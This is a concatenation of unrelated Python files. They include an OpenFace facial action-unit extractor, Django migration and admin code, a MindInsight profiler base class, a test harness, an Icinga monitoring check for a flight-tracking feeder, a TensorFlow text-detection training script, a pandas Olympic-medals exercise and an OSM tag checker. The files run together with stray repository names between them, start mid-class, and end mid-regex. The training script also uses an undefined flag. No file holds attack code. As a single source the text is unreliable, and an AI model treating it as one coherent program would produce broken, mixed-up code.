self).__init__() self.ALL_AUS = ['AU01', 'AU02', 'AU04', 'AU05', 'AU06', 'AU07', 'AU09', 'AU10', 'AU12', \ 'AU14', 'AU15', 'AU17', 'AU20', 'AU23', 'AU25', 'AU26', 'AU28', 'AU45'] def initialize(self, opt): self.bin_path = opt.bin_path self.img_ext = opt.img_ext self.raw_img_dir = opt.raw_img_dir self.out_dir = os.path.join(opt.root_dir, 'aus_csv') if not os.path.isdir(self.out_dir): os.makedirs(self.out_dir) self.pkl_path = os.path.join(opt.root_dir, 'aus_openface.pkl') self.FILTER_AUS = sorted(map(lambda x: 'AU%02d' % int(x), list(opt.aus.split(',')))) def run(self): total_aus_dict = {} imgs_path = self.get_image_list() # [:3] imgs_len = len(imgs_path) total_cost = 0.0 for idx, img_path in enumerate(imgs_path): start_t = time.time() total_aus_dict.update(self.detect_aus(img_path)) cur_cost = time.time() - start_t total_cost += cur_cost avg_cost = total_cost / (idx + 1.) print("[Success][%d/%d] Got AU of %s in %.2fs, remaining %.2f mins." % (idx, imgs_len - 1, os.path.basename(img_path), cur_cost, (imgs_len - idx - 1.) 
* avg_cost / 60.)) with open(self.pkl_path, 'wb') as f: pickle.dump(total_aus_dict, f, protocol=2) return total_aus_dict def detect_aus(self, img_path): # run au bin img_name = os.path.basename(img_path) out_name = os.path.splitext(img_name)[0] with open(os.devnull, 'w') as shutup: command_list = [self.bin_path, '-f', img_path, '-out_dir', self.out_dir, '-of', out_name, '-aus'] return_code = subprocess.call(command_list, stdout=shutup, stderr=shutup) # parse au csv_path = os.path.join(self.out_dir, out_name + ".csv") aus_dict = {} try: with open(csv_path, 'r') as f: csv_reader = csv.reader(f) for idx, row in enumerate(csv_reader): # if idx == 0: # print(row[2:2+17]) if idx > 0: aus_dict[img_name] = [int(float(row[19+i])) for i, n in enumerate(self.ALL_AUS) if n in self.FILTER_AUS] except IOError: with open(os.path.join(self.out_dir, 'err.log'), 'a+') as f: f.write("Fail to detect au on %s.\n" % img_name) # clear tmp file txt_path = os.path.join(self.out_dir, out_name + "_of_details.txt") if os.path.isfile(txt_path): os.remove(txt_path) # return current au list return aus_dict def get_image_list(self): # copy from preprocess_ckplus.py image_list = [] for subject in glob.glob(os.path.join(self.raw_img_dir, '*/')): for clip in glob.glob(os.path.join(subject, '*/')): items = sorted(glob.glob(os.path.join(clip, '*.%s' % self.img_ext))) image_list.extend(items[-3:]) print(len(image_list)) return image_list def main(): ausDetector = AUSDetector() cur_file_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--bin_path', required=True, help="OpenFace binary path 'FaceLandmarkImg'.") parser.add_argument('--aus', type=str, default='1,2,4,5,6,7,9,12,17,23,25', help='AUs vector index.') parser.add_argument('--img_ext', type=str, default='png', help='Image extension.') parser.add_argument('--raw_img_dir', type=str, default=os.path.join(cur_file_path, '../datasets/CKPlus/RAW/cohn-kanade-images'), help='raw image dataset dir.') parser.add_argument('--root_dir', type=str, default=os.path.join(cur_file_path, '../datasets/CKPlus'), help='dataset root dir.') opt = parser.parse_args() ausDetector.initialize(opt) ausDetector.run() if __name__ == "__main__": main() # Generated by Django 2.2.2 on 2019-06-24 15:20 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('shorterurls', '0001_initial'), ] operations = [ migrations.RenameField( model_name='storedurls', old_name='url_after_short', new_name='full_url', ), migrations.RenameField( model_name='storedurls', old_name='url_before_short', new_name='short_url', ), ] # Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# ============================================================================ """The proposer base class.""" from abc import ABC, abstractmethod from marshmallow import ValidationError from mindinsight.profiler.common.log import logger from mindinsight.profiler.analyser.analyser_factory import AnalyserFactory from mindinsight.utils.exceptions import MindInsightException from mindinsight.profiler.common.validator.validate_path import \ validate_and_normalize_path from mindinsight.profiler.common.exceptions.exceptions import ProfilerPathErrorException class Proposer(ABC): """The proposer base class.""" def __init__(self, profiling_path, rank_id): self.profiling_path = self._normalize_profiling_dir(profiling_path) self.rank_id = rank_id def get_analyser_result(self, analyser_type, condition=None): logger.debug("The Proposer 'analyser_type' is %s, 'options' is %s", str(analyser_type), str(condition)) analyser_result = {} try: analyser = AnalyserFactory.instance().get_analyser(analyser_type, self.profiling_path, self.rank_id) analyser_result = analyser.query(condition) logger.debug("The 'analyser_result' is %s, the 'condition' is %s.", str(analyser_result), str(condition)) except MindInsightException as e: logger.warning(e) return analyser_result @abstractmethod def analyze(self, options=None): """analysis and get proposal.""" raise NotImplementedError("Must define analyze function to inherit Class Propose") @staticmethod def _normalize_profiling_dir(profiling_dir): """ Normalize the profiling dir. Args: profiling_dir (str): The directory where the parsed profiling files are located. Returns: str, the normalized profiling dir. """ try: normalized_profiling_dir = validate_and_normalize_path( profiling_dir, 'profiler' ) except ValidationError: raise ProfilerPathErrorException('The profiling dir is invalid.') return normalized_profiling_dir # -*- coding: utf-8 -*- """ Created on Mon Feb 11 17:46:56 2019 @author: """ import signal import threading from Util.Log import * class TestResult(Enum): Success = 0 Failure = 1 class Test(object): def __init__(self, name=None, network=None): self.name = name if name is not None else type(self).__name__ self.network = network self.process_interval = 1 self.update_interval = 1 self.result = None self.max_duration = 0 self.timeout_timer = None self.events_timer = None self.update_timer = None def setup(self): pass def update(self): pass def on_complete(self): pass def on_succeed(self): pass def on_fail(self): pass def update_timer_fired(self): self.update() self.update_timer = threading.Timer(self.update_interval, self.update_timer_fired) self.update_timer.start() def events_timer_fired(self): self.network.process_events() self.events_timer = threading.Timer(self.process_interval, self.events_timer_fired) self.events_timer.start() def timeout_timer_fired(self): if self.result is None: self.finish_with_result(TestResult.Failure) def sigint_handler(self, *args): self.stop() def start(self): try: Log.info("\nTest started (" + self.name + ")\n") signal.signal(signal.SIGINT, self.sigint_handler) self.setup() self.events_timer = threading.Timer(self.process_interval, self.events_timer_fired) self.events_timer.start() self.update_timer = threading.Timer(self.update_interval, self.update_timer_fired) self.update_timer.start() if self.max_duration > 0: self.timeout_timer = threading.Timer(self.max_duration, self.timeout_timer_fired) self.timeout_timer.start() except (KeyboardInterrupt, SystemExit): Log.error("\nAborting.") def stop(self): if self.timeout_timer is not 
None: self.timeout_timer.cancel() if self.events_timer is not None: self.events_timer.cancel() if self.update_timer is not None: self.update_timer.cancel() def finish_with_result(self, result): self.stop() if self.network is not None: print() self.network.shutdown() self.result = result self.on_complete() if result == TestResult.Success: Log.info("\nTest succeeded (" + self.name + ")\n") self.on_succeed() if result == TestResult.Failure: Log.warn("\nTest failed (" + self.name + ")\n") self.on_fail() shubham2803/todo0 from django.contrib import admin from rest_framework.authtoken.models import Token from .models import Todo # Register your models here. admin.site.register(Todo) class FilterTokenAdmin(admin.ModelAdmin): search_fields = ['user__email', 'user__username'] admin.site.register(Token, FilterTokenAdmin) 0 #! /usr/bin/env python3 # -*- coding: utf-8; py-indent-offset: 4 -*- # # Author: # Contact: icinga (at) buchermail (dot) de # # License: The Unlicense, see LICENSE file. # https://github.com/anbucher/check_fr24feed.git """Have a look at the check's README for further details. """ import argparse from difflib import diff_bytes import sys import json import datetime import requests from requests.structures import CaseInsensitiveDict from traceback import format_exc __author__ = '' __version__ = '2022031701' DESCRIPTION = """This plugin lets you track if a fr24feeder is connected""" # Sample URL: https://{feeder_ip}:8754/monitor.json DEFAULT_PORT = '8754' DEFAULT_WARN = 600 # seconds DEFAULT_CRIT = 3600 # seconds ## Define states # STATE_OK = 0: The plugin was able to check the service and it appeared # to be functioning properly. # STATE_WARN = 1: The plugin was able to check the service, but it # appeared to be above some "warning" threshold or did not appear to be # working properly. # STATE_CRIT = 2: The plugin detected that either the service was not # running or it was above some "critical" threshold. # STATE_UNKNOWN = 3: Invalid command line arguments were supplied to the # plugin or low-level failures internal to the plugin (such as unable to # fork, or open a tcp socket) that prevent it from performing the # specified operation. Higher-level errors (such as name resolution # errors, socket timeouts, etc) are outside of the control of plugins and # should generally NOT be reported as UNKNOWN states. # Author of state definition # __author__ = 'Linuxfabrik GmbH, Zurich/Switzerland' # __version__ = '2020043001' STATE_OK = 0 STATE_WARN = 1 STATE_CRIT = 2 STATE_UNKNOWN = 3 #STATE_DEPENDENT = 4 ########### common functions ########### # useful functions - Copyright by https://git.linuxfabrik.ch/linuxfabrik/lib/-/blob/master/base3.py def get_perfdata(label, value, uom, warn, crit, min, max): """Returns 'label'=value[UOM];[warn];[crit];[min];[max] """ msg = "'{}'={}".format(label, value) if uom is not None: msg += uom msg += ';' if warn is not None: msg += str(warn) msg += ';' if crit is not None: msg += str(crit) msg += ';' if min is not None: msg += str(min) msg += ';' if max is not None: msg += str(max) msg += ' ' return msg def oao(msg, state=STATE_OK, perfdata='', always_ok=False): """Over and Out (OaO) Print the stripped plugin message. If perfdata is given, attach it by `|` and print it stripped. Exit with `state`, or with STATE_OK (0) if `always_ok` is set to `True`. 
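Example (an illustrative sketch using `get_perfdata` from above; the call
prints the message plus perfdata and then exits with code 0 because
`state` is `STATE_OK`):

>>> oao('Feeder OK', STATE_OK, get_perfdata('sum_tracked', 12, None, None, None, 0, None))
Feeder OK|'sum_tracked'=12;;;0;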
""" if perfdata: print(msg.strip() + '|' + perfdata.strip()) else: print(msg.strip()) if always_ok: sys.exit(0) sys.exit(state) def coe(result, state=STATE_UNKNOWN): """Continue or Exit (CoE) This is useful if calling complex library functions in your checks `main()` function. Don't use this in functions. If a more complex library function, for example `lib.url3.fetch()` fails, it returns `(False, 'the reason why I failed')`, otherwise `(True, 'this is my result'). This forces you to do some error handling. To keep things simple, use `result = lib.base3.coe(lib.url.fetch(...))`. If `fetch()` fails, your plugin will exit with STATE_UNKNOWN (default) and print the original error message. Otherwise your script just goes on. The use case in `main()` - without `coe`: >>> success, html = lib.url3.fetch(URL) >>> if not success: >>> print(html) # contains the error message here >>>> exit(STATE_UNKNOWN) Or simply: >>> html = lib.base3.coe(lib.url.fetch(URL)) Parameters ---------- result : tuple The result from a function call. result[0] = expects the function return code (True on success) result[1] = expects the function result (could be of any type) state : int If result[0] is False, exit with this state. Default: 3 (which is STATE_UNKNOWN) Returns ------- any type The result of the inner function call (result[1]). """ if result[0]: # success return result[1] print(result[1]) sys.exit(state) ########### specific check functions ########### def parse_args(): """Parse command line arguments using argparse. """ parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument( '-V', '--version', action='version', version='%(prog)s: v{} by {}'.format(__version__, __author__) ) parser.add_argument( '--always-ok', help='Always returns OK.', dest='ALWAYS_OK', action='store_true', default=False, ) parser.add_argument( '--host', help='Host IP address of your feeder.', dest='HOST_IP', required=True, default=False, ) parser.add_argument( '--port', help='Monitor Port of your feeder. Default: %(default)s', dest='HOST_PORT', default=DEFAULT_PORT, ) parser.add_argument( '-c', '--critical', help='Set the critical threshold seconds since last connection update. Default: %(default)s', dest='CRIT', type=int, default=DEFAULT_CRIT, ) parser.add_argument( '-w', '--warning', help='Set the warning threshold seconds since last connection update. Default: %(default)s', dest='WARN', type=int, default=DEFAULT_WARN, ) return parser.parse_args() def run_monitor_check(path): """Check FR24 feeder. """ headers = CaseInsensitiveDict() headers["Accept"] = "application/json" # Get data from monitor.json try: j = requests.get(path, headers=headers) json_str = j.json() except Exception as ex: template = "An exception of type {0} occurred. Arguments:\n{1!r}" msg = template.format(type(ex).__name__, ex.args) return(False, msg) # FAKE request # f = open("sample_data/monitor.json") # json_str = json.load(f) try: return (True, json_str) except: return(False, 'ValueError: No JSON object could be decoded') def get_sec_last_status(data): """Read out seconds since last status update. 
""" # Get current datetime now = datetime.datetime.utcnow() # Check date difference try: ### timeFormat: 2022-03-17 12:39:31 datetimeunix = int(data['feed_last_ac_sent_time']) # lastsentTime = datetime.datetime.strptime(datetimestring, '%Y-%m-%d %H:%M:%S') lastsentTime = datetime.datetime.utcfromtimestamp(datetimeunix) # calculate time difference diffInSecs = (abs(now - lastsentTime ).days * 24 * 60 * 60) + abs(now - lastsentTime ).seconds return (True, diffInSecs) except: return (False, 'ValueError: Last Status could not be parsed') def get_metrics(data): try: metrics = { 'adsb_tracked': data['feed_num_ac_adsb_tracked'], 'non_adsb_tracked': data['feed_num_ac_non_adsb_tracked'], 'sum_tracked': data['feed_num_ac_tracked'] } return (True, metrics) except: return (False, 'ValueError: Metrics could not be parsed') def get_status(data): try: status = { 'feed_status': data['feed_status'] , 'last_rx_connect_status': data['last_rx_connect_status'], 'feed_last_connected_time': datetime.datetime.utcfromtimestamp(int(data['feed_last_connected_time'])).strftime("%Y-%m-%d %H:%M:%S") } return (True, status) except: return (False, 'ValueError: Status could not be parsed') def main(): """The main function. Hier spielt die Musik. """ # parse the command line, exit with UNKNOWN if it fails try: args = parse_args() except SystemExit: sys.exit(STATE_UNKNOWN) # init output vars msg = '' state = STATE_OK perfdata = '' # Build url path = 'http://' + args.HOST_IP + ':' + args.HOST_PORT + '/monitor.json' response = coe(run_monitor_check(path)) diffSecs = coe(get_sec_last_status(response)) metrics = coe(get_metrics(response)) status = coe(get_status(response)) # # Add metrics to perfdata perfdata += get_perfdata('adsb_tracked', metrics['adsb_tracked'], None, None, None, 0, None) perfdata += get_perfdata('non_adsb_tracked', metrics['non_adsb_tracked'], None, None, None, 0, None) perfdata += get_perfdata('sum_tracked', metrics['sum_tracked'], None, None, None, 0, None) # check warn and crit thresholds try: if diffSecs > args.CRIT: msg += 'CRIT threshold reached: ' + str(diffSecs) state = STATE_CRIT else: if diffSecs > args.WARN: msg += 'WARN threshold reached: ' + str(diffSecs) state = STATE_WARN else: msg = 'Feeder: OK - ' + str(diffSecs) + 's since last upload' msg += '\nStatus: {}'.format(status['feed_status'] + ' since ' + status['feed_last_connected_time'] ) state = STATE_OK except Exception as ex: template = "An exception of type {0} occurred. Arguments:\n{1!r}" msg = template.format(type(ex).__name__, ex.args) state = STATE_UNKNOWN oao(msg, state, perfdata) if __name__ == '__main__': try: main() except Exception: # pylint: disable=W0703 """See you (cu) Prints a Stacktrace (replacing "<" and ">" to be printable in Web-GUIs), and exits with STATE_UNKNOWN. """ print(format_exc().replace("<", "'").replace(">", "'")) sys.exit(STATE_UNKNOWN) # Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# ============================================================================ # Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import numpy as np import tensorflow as tf import random from tensorflow.contrib import slim tf.app.flags.DEFINE_integer('input_size', 512, '') tf.app.flags.DEFINE_integer('batch_size_per_gpu', 14, '') tf.app.flags.DEFINE_integer('num_readers', 16, '') tf.app.flags.DEFINE_float('learning_rate', 0.0001, '') tf.app.flags.DEFINE_integer('max_steps', 100000, '') tf.app.flags.DEFINE_float('moving_average_decay', 0.997, '') tf.app.flags.DEFINE_string('gpu_list', '0', '') tf.app.flags.DEFINE_string('checkpoint_path', '/tmp/east_resnet_v1_50_rbox/', '') tf.app.flags.DEFINE_boolean('restore', False, 'whether to resotre from checkpoint') tf.app.flags.DEFINE_integer('save_checkpoint_steps', 1000, '') tf.app.flags.DEFINE_integer('save_summary_steps', 100, '') tf.app.flags.DEFINE_string('pretrained_model_path', None, '') tf.app.flags.DEFINE_boolean('use_processed_data', False, 'whether to use processed data') tf.app.flags.DEFINE_string('processed_data', './processed_dataset/', 'where to save preprocessed datasets') import model import icdar FLAGS = tf.app.flags.FLAGS gpus = list(range(len(FLAGS.gpu_list.split(',')))) def tower_loss(images, score_maps, geo_maps, training_masks, reuse_variables=None): # Build inference graph with tf.variable_scope(tf.get_variable_scope(), reuse=reuse_variables): f_score, f_geometry = model.model(images, is_training=True) model_loss = model.loss(score_maps, f_score, geo_maps, f_geometry, training_masks) total_loss = tf.add_n([model_loss] + tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) # add summary if reuse_variables is None: tf.summary.image('input', images) tf.summary.image('score_map', score_maps) tf.summary.image('score_map_pred', f_score * 255) tf.summary.image('geo_map_0', geo_maps[:, :, :, 0:1]) tf.summary.image('geo_map_0_pred', f_geometry[:, :, :, 0:1]) tf.summary.image('training_masks', training_masks) tf.summary.scalar('model_loss', model_loss) tf.summary.scalar('total_loss', total_loss) return total_loss, model_loss def average_gradients(tower_grads): average_grads = [] for grad_and_vars in zip(*tower_grads): grads = [] for g, _ in grad_and_vars: expanded_g = tf.expand_dims(g, 0) grads.append(expanded_g) grad = tf.concat(grads, 0) grad = tf.reduce_mean(grad, 0) v = grad_and_vars[0][1] grad_and_var = (grad, v) average_grads.append(grad_and_var) return average_grads def main(argv=None): import os os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu_list if not tf.gfile.Exists(FLAGS.checkpoint_path): tf.gfile.MkDir(FLAGS.checkpoint_path) else: if not FLAGS.restore: tf.gfile.DeleteRecursively(FLAGS.checkpoint_path) tf.gfile.MkDir(FLAGS.checkpoint_path) input_images = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='input_images') input_score_maps = tf.placeholder(tf.float32, shape=[None, None, None, 1], name='input_score_maps') if FLAGS.geometry == 'RBOX': input_geo_maps = 
tf.placeholder(tf.float32, shape=[None, None, None, 5], name='input_geo_maps') else: input_geo_maps = tf.placeholder(tf.float32, shape=[None, None, None, 8], name='input_geo_maps') input_training_masks = tf.placeholder(tf.float32, shape=[None, None, None, 1], name='input_training_masks') global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False) learning_rate = tf.train.exponential_decay(FLAGS.learning_rate, global_step, decay_steps=10000, decay_rate=0.94, staircase=True) # add summary tf.summary.scalar('learning_rate', learning_rate) opt = tf.train.AdamOptimizer(learning_rate) # opt = tf.train.MomentumOptimizer(learning_rate, 0.9) # split input_images_split = tf.split(input_images, len(gpus)) input_score_maps_split = tf.split(input_score_maps, len(gpus)) input_geo_maps_split = tf.split(input_geo_maps, len(gpus)) input_training_masks_split = tf.split(input_training_masks, len(gpus)) tower_grads = [] reuse_variables = None for i, gpu_id in enumerate(gpus): with tf.device('/gpu:%d' % gpu_id): with tf.name_scope('model_%d' % gpu_id) as scope: iis = input_images_split[i] isms = input_score_maps_split[i] igms = input_geo_maps_split[i] itms = input_training_masks_split[i] total_loss, model_loss = tower_loss(iis, isms, igms, itms, reuse_variables) batch_norm_updates_op = tf.group(*tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope)) reuse_variables = True grads = opt.compute_gradients(total_loss) tower_grads.append(grads) grads = average_gradients(tower_grads) apply_gradient_op = opt.apply_gradients(grads, global_step=global_step) summary_op = tf.summary.merge_all() # save moving average variable_averages = tf.train.ExponentialMovingAverage( FLAGS.moving_average_decay, global_step) variables_averages_op = variable_averages.apply(tf.trainable_variables()) # batch norm updates with tf.control_dependencies([variables_averages_op, apply_gradient_op, batch_norm_updates_op]): train_op = tf.no_op(name='train_op') saver = tf.train.Saver(tf.global_variables()) summary_writer = tf.summary.FileWriter(FLAGS.checkpoint_path, tf.get_default_graph()) init = tf.global_variables_initializer() if FLAGS.pretrained_model_path is not None: variable_restore_op = slim.assign_from_checkpoint_fn(FLAGS.pretrained_model_path, slim.get_trainable_variables(), ignore_missing_vars=True) with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess: if FLAGS.restore: print('continue training from previous checkpoint') ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_path) saver.restore(sess, ckpt) else: sess.run(init) if FLAGS.pretrained_model_path is not None: variable_restore_op(sess) data_generator = icdar.get_batch(num_workers=FLAGS.num_readers, input_size=FLAGS.input_size, batch_size=FLAGS.batch_size_per_gpu * len(gpus)) start = time.time() for step in range(FLAGS.max_steps): if FLAGS.use_processed_data: index = random.randint(0, 1000 - 1) images = np.fromfile(os.path.join(FLAGS.processed_data, 'input_images_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, FLAGS.input_size, FLAGS.input_size, 3) score_maps = np.fromfile(os.path.join(FLAGS.processed_data, 'input_score_maps_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, 128, 128, 1) geo_maps = np.fromfile(os.path.join(FLAGS.processed_data, 'input_geo_maps_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, 128, 128, 5) training_masks = np.fromfile( os.path.join(FLAGS.processed_data, 'input_training_masks_{}.bin'.format(index)), 
dtype='float32').reshape(FLAGS.batch_size_per_gpu, 128, 128, 1) else: data = next(data_generator) images = data[0] score_maps = data[2] geo_maps = data[3] training_masks = data[4] ml, tl, _ = sess.run([model_loss, total_loss, train_op], feed_dict={input_images: images, input_score_maps: score_maps, input_geo_maps: geo_maps, input_training_masks: training_masks}) if np.isnan(tl): print('Loss diverged, stop training') break if step % 10 == 0: avg_time_per_step = (time.time() - start)/10 avg_examples_per_second = (10 * FLAGS.batch_size_per_gpu * len(gpus))/(time.time() - start) start = time.time() print('Step {:06d}, model loss {:.4f}, total loss {:.4f}, {:.2f} seconds/step, {:.2f} examples/second'.format( step, ml, tl, avg_time_per_step, avg_examples_per_second)) if step % FLAGS.save_checkpoint_steps == 0: saver.save(sess, FLAGS.checkpoint_path + 'model.ckpt', global_step=global_step) if step % FLAGS.save_summary_steps == 0: _, tl, summary_str = sess.run([train_op, total_loss, summary_op], feed_dict={input_images: images, input_score_maps: score_maps, input_geo_maps: geo_maps, input_training_masks: training_masks}) summary_writer.add_summary(summary_str, global_step=step) if __name__ == '__main__': tf.app.run() # -------------- #Importing header files import pandas as pd import numpy as np import matplotlib.pyplot as plt #Path of the file is stored in the variable path #Code starts here # STEP 1: Data Loading data=pd.read_csv(path) data.rename(columns = {'Total':'Total_Medals'}, inplace = True) # data.head(10) # STEP 2: Summer or Winter # Creating new column 'Better_Event data['Better_Event']=np.where(data['Total_Summer']>data['Total_Winter'],'Summer','Winter') data['Better_Event']=np.where(data['Total_Summer']==data['Total_Winter'],'Both',data['Better_Event']) # Finding the value with max count in 'Better_Event' column better_event=data['Better_Event'].value_counts().index.values[0] # #Printing the better event # print('Better_Event=', better_event) # STEP 3: Top 10 #Subsetting the dataframe top_countries= data[['Country_Name','Total_Summer', 'Total_Winter','Total_Medals']] #Dropping the last row top_countries=top_countries[:-1] #Function for top 10 def top_ten(data,col): # Creating new empty list country_list=[] #Finding the top 10 values of 'col' column country_list=list((data.nlargest(10,col)['Country_Name'])) #Returning the top 10 list return country_list #Calling the function for Top 10 in Summer top_10_summer=top_ten(top_countries,'Total_Summer') #Calling the function for Top 10 in Winter top_10_winter=top_ten(top_countries,'Total_Winter') #Calling the function for Top 10 in both the events top_10=top_ten(top_countries,'Total_Medals') print("Top 10:\n",top_10, "\n") #Extracting common country names from all three lists common=list(set(top_10_summer) & set(top_10_winter) & set(top_10)) print('Common Countries :\n',common, "\n") # STEP 4: Plotting top 10 # For Summer #Creating the dataframe for Summer event summer_df= data[data['Country_Name'].isin(top_10_summer)] #Plotting the bar graph plt.figure(figsize=(20, 6)) plt.bar(summer_df['Country_Name'], summer_df['Total_Summer']) #Changing the graph title plt.title('Top 10 Summer') #Changing the x-axis label plt.xlabel('Country Name') #Changing the y-axis label plt.ylabel('Total Medals') plt.show() # For Winter #Creating the dataframe for Winter event winter_df= data[data['Country_Name'].isin(top_10_winter)] #Plotting the bar graph plt.figure(figsize=(20, 6)) plt.bar(winter_df['Country_Name'], winter_df['Total_Winter']) #Changing the graph 
title plt.title('Top 10 Winter') #Changing the x-axis label plt.xlabel('Country Name') #Changing the y-axis label plt.ylabel('Total Medals') plt.show() #For both the events #Creating the dataframe for both the events top_df=data[data['Country_Name'].isin(top_10)] #Plotting the bar graph plt.figure(figsize=(20, 6)) plt.bar(top_df['Country_Name'], top_df['Total_Medals']) #Changing the graph title plt.title('Top 10') #Changing the x-axis label plt.xlabel('Country Name') #Changing the y-axis label plt.ylabel('Total Medals') plt.show() # STEP 5: Top Performing Countries # FOR SUMMMER LIST #Creating new column 'Golden_Ratio' summer_df['Golden_Ratio']=summer_df['Gold_Summer']/summer_df['Total_Summer'] #Finding the max value of 'Golden_Ratio' column summer_max_ratio=max(summer_df['Golden_Ratio']) #Finding the country associated with the max value of 'Golden_Ratio' column summer_country_gold=summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Summer Country:", summer_country_gold, " with a ratio of %.2f" %summer_max_ratio ) #For Winter List #Creating new column 'Golden_Ratio' winter_df['Golden_Ratio']=winter_df['Gold_Winter']/winter_df['Total_Winter'] #Finding the max value of 'Golden_Ratio' column winter_max_ratio=max(winter_df['Golden_Ratio']) #Finding the country assosciated with the max value of 'Golden_Ratio' column winter_country_gold=winter_df.loc[winter_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Winter Country:", winter_country_gold, " with a ratio of %.2f" %winter_max_ratio ) #For Overall List #Creating new column 'Golden_Ratio' top_df['Golden_Ratio']=top_df['Gold_Total']/top_df['Total_Medals'] #Finding the max value of 'Golden_Ratio' column top_max_ratio=max(top_df['Golden_Ratio']) #Finding the country assosciated with the max value of 'Golden_Ratio' column top_country_gold=top_df.loc[top_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Country:", top_country_gold, " with a ratio of %.2f" %top_max_ratio ) # STEP 6 : Best in the world #Removing the last row of the data data_1=data[:-1] #Creating a new column 'Total_Points' data_1['Total_Points']= data_1['Gold_Total']*3 + data_1['Silver_Total']*2 + data_1['Bronze_Total']*1 # Use of position index to handle the ambiguity of having same name columns #Finding the maximum value of 'Total_Points' column most_points=max(data_1['Total_Points']) #Finding the country assosciated with the max value of 'Total_Column' column best_country=data_1.loc[data_1['Total_Points'].idxmax(),'Country_Name'] print('The maximum points achieved is ', most_points, ' by ', best_country ) # STEP 7: Plotting the best #Subsetting the dataframe best=data[data['Country_Name']==best_country] best.reset_index(drop=True,inplace=True) best=best[['Gold_Total','Silver_Total','Bronze_Total']] best.plot.bar(stacked=True) #Changing the x-axis label plt.xlabel('United States') #Changing the y-axis label plt.ylabel('medals Tally') #Rotating the ticks of X-axis plt.xticks(rotation=45) plt.show() 1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- import time import logging import zlib import ujson as json from copy import copy from telephus.cassandra.c08.ttypes import NotFoundException from twisted.internet.defer import inlineCallbacks, returnValue from hiispider.components import * from hiispider.metacomponents import * import logging from hiiguid import HiiGUID from zlib import decompress from difflib import SequenceMatcher import binascii from pprint import pformat from .base import MetaComponent LOGGER = logging.getLogger(__name__) class 
DeltaTesting(MetaComponent): allow_clients = False requires = [Cassandra] def __init__(self, server, config, server_mode, **kwargs): super(DeltaTesting, self).__init__(server, server_mode) self.config = copy(config) self.service_mapping = config["service_mapping"] self.server.expose(self.regenerate_by_uuid) @inlineCallbacks def regenerate_by_uuid(self, uuid): delta = yield self.server.cassandra.get_delta(uuid) function_name = self.service_mapping.get( delta["subservice"], delta["subservice"]) delta_func = self.server.functions[function_name]["delta"] if not delta_func: raise Exception("Delta function %s " "does not exist." % delta["service"]) deltas = delta_func(delta["new_data"], delta["old_data"]) if not deltas: raise Exception("No deltas were generated.") # Find nearest delta. delta_options = [] s = SequenceMatcher() s.set_seq1(json.dumps(delta["data"])) for delta in deltas: LOGGER.debug(pformat(delta.data)) value = json.dumps(delta.data) s.set_seq2(value) delta_options.append((s.ratio(), value, delta.data)) # Sort to find the most similar option. delta_options = sorted(delta_options, key=lambda x: x[0]) replacement_data = zlib.compress(json.dumps(delta_options[-1][2])) ts = str(time.time()) mapping = {"updated": ts, "data": replacement_data} yield self.server.cassandra.batch_insert( key=binascii.unhexlify(uuid), column_family=self.server.cassandra.cf_delta, mapping=mapping, consistency=2) LOGGER.debug("%s deltas generated." % len(deltas)) returnValue(True) blockchainhelppro/dataanalysis-Crypto import xml.etree.cElementTree as ET import pprint from collections import defaultdict import re ''' The code below allows you to check the k value for each tag. By classifying the tagss into few categories: 1. "lower": valid tags containing only lowercase letters 2. "lower_colon": valid tags with a colon in the names 3. "problemchars": tags with problematic characters 4. "other": other tags that don't fall into the 3 categories above ''' lower = re.compile(r'^([a-z]|_)*$') lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$') problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. 
